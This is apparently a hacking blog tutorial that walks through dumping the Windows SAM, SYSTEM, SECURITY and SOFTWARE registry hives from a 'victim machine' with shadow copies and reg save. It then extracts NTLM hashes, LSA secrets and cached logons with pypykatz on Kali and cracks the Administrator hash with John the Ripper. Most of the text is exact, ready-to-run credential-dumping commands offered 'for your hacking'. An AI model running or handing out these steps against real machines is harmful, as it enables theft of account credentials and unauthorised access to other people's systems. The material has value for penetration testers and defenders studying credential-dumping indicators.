In this post we'll dive into the methods to dump the SAM database, decrypt it and attempt to obtain Windows credentials. Whether you are a casual Windows user or an IT professional, a better understanding of the SAM database gives valuable insight into how Windows works internally.
What Is the SAM Database?
The SAM database (Security Accounts Manager database) is a core part of the Windows operating system. It is a registry hive that stores local user account information: usernames, group memberships and the password hashes (LM and NT hashes, never the plaintext passwords). Its primary purpose is to authenticate local users when they sign in to a Windows device.
The SAM hive lives on disk in the %SystemRoot%\System32\config folder, in a file named SAM. While the operating system is running, the file is held open exclusively by the kernel, so it cannot be read or copied directly, and the hashes inside it are additionally encrypted with key material that lives in the SYSTEM hive. Administrators interact with it through built-in tools such as the Local Users and Groups snap-in (lusrmgr.msc) or the net user command in the command prompt.
It's important to note that the SAM database holds local accounts only; domain accounts in an Active Directory environment are stored in NTDS.dit on the domain controllers.
Obtaining Key Files
In this section we dump the core files we need to decrypt the SAM database.
First we determine the local computer name from the associated environment variable (PowerShell):
$env:computername
result: DESKTOP-PQIB8HT
Now we use that result to query the WMI Win32_UserAccount class for the Administrator account:
[wmi] "Win32_UserAccount.Domain='DESKTOP-PQIB8HT',Name='Administrator'"
This returns the account's properties, including its SID. The last component of the SID is the RID: the built-in Administrator always has RID 500, whatever it has been renamed to, which is how we know which account's hash to go after later.
Methods to dump the SAM database:
From a cmd prompt run as administrator, go to the folder that holds the hives:
cd C:\Windows\System32\config
(SAM itself is a file in this folder, not a folder, and a plain copy of it from here fails because the file is locked.)
There are multiple methods to obtain the SAM database; here I will show you three of them.
- Use the Volume Shadow Copy Service to create a snapshot or "shadow volume" of the local hard drive with vssadmin create shadow
The create shadow subcommand of vssadmin is only available on Windows Server editions; on client editions vssadmin can only list and delete shadow copies.
- Do the same thing with WMIC, launched from an administrator command prompt (WMIC is deprecated and is being removed from current Windows releases, but the Win32_ShadowCopy.Create method it calls is equally reachable from PowerShell)
wmic shadowcopy call create Volume='C:\'
This creates a snapshot of the C: drive.
To verify that the previous step completed, list the existing shadow copies with vssadmin:
vssadmin list shadows
Now that we can see the shadow copy volume, we copy the SAM database out of it, using the device path from the listing as the source:
Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Users\
We now have a local copy. Note that the hashes in it are still encrypted, with RC4 on older builds and AES since Windows 10 1607, under a key derived from the boot key, which is spread across the SYSTEM hive. SYSTEM sits in the same config folder as SAM and is locked by the kernel in the same way.
So we copy that file from the shadow copy too, using the same source path with SYSTEM in place of SAM.
- Get a copy of the SAM and SYSTEM hives straight from the live registry, from
- HKLM\sam
- HKLM\system
This one is by far my favorite and the method I recommend.
reg save HKLM\sam C:\Users\sam
reg save HKLM\system C:\Users\system
reg save needs an elevated prompt, and saving HKLM\SAM is one of the best-known credential-dumping indicators, so expect Defender or any EDR to flag it.
Decryption
Let's move to the fun part: decrypting the SAM database. Until recently there were two ways to do it: either with Mimikatz or with creddump7.
None of those have worked for me, so we will use a third option.
For this we need to move the files we dumped from the Windows victim machine to our Kali machine. I moved them using Google Drive, but you can also copy them over a network share.
Prepare the environment: upgrade pip and install pypykatz, which pulls in the crypto libraries it needs (the unrelated PyPI package named "crypto" is not one of them):
python3.10 -m pip install --upgrade pip
python3.10 -m pip install pypykatz
The third option I mentioned is to decrypt the SAM database using pypykatz.
pypykatz can also parse the SECURITY hive (LSA secrets, including the DPAPI_SYSTEM key and cached domain logons) and the SOFTWARE hive (for example an autologon DefaultPassword), so we go back to our victim machine and dump those files too. (Now that you know, you will get all the files at once 😊)
reg save HKLM\software C:\Users\software
reg save HKLM\security C:\Users\security
And finally we are ready to run pypykatz against the dumped hives. SYSTEM is the positional argument because the boot key is derived from it; the other hives are passed by option and -o writes the results to a file.
pypykatz registry --sam /home/info/Downloads/sam --security /home/info/Downloads/security --software /home/info/Downloads/software -o hashes.txt /home/info/Downloads/system
The output lists the NTLM hashes of the local accounts in pwdump format (user:RID:LM hash:NT hash:::), the Administrator account among them, plus whatever LSA secrets and cached credentials were in the SECURITY hive ... and other good stuff as well.
From here you have multiple options to crack the hash; I like using John the Ripper, for example.
Copy the Administrator line into a txt file; john reads that pwdump line directly with --format=NT.
Here you have it, our password is: Administrator.
I hope you enjoyed this post and you find it useful for your hacking. See you in the next post! ♥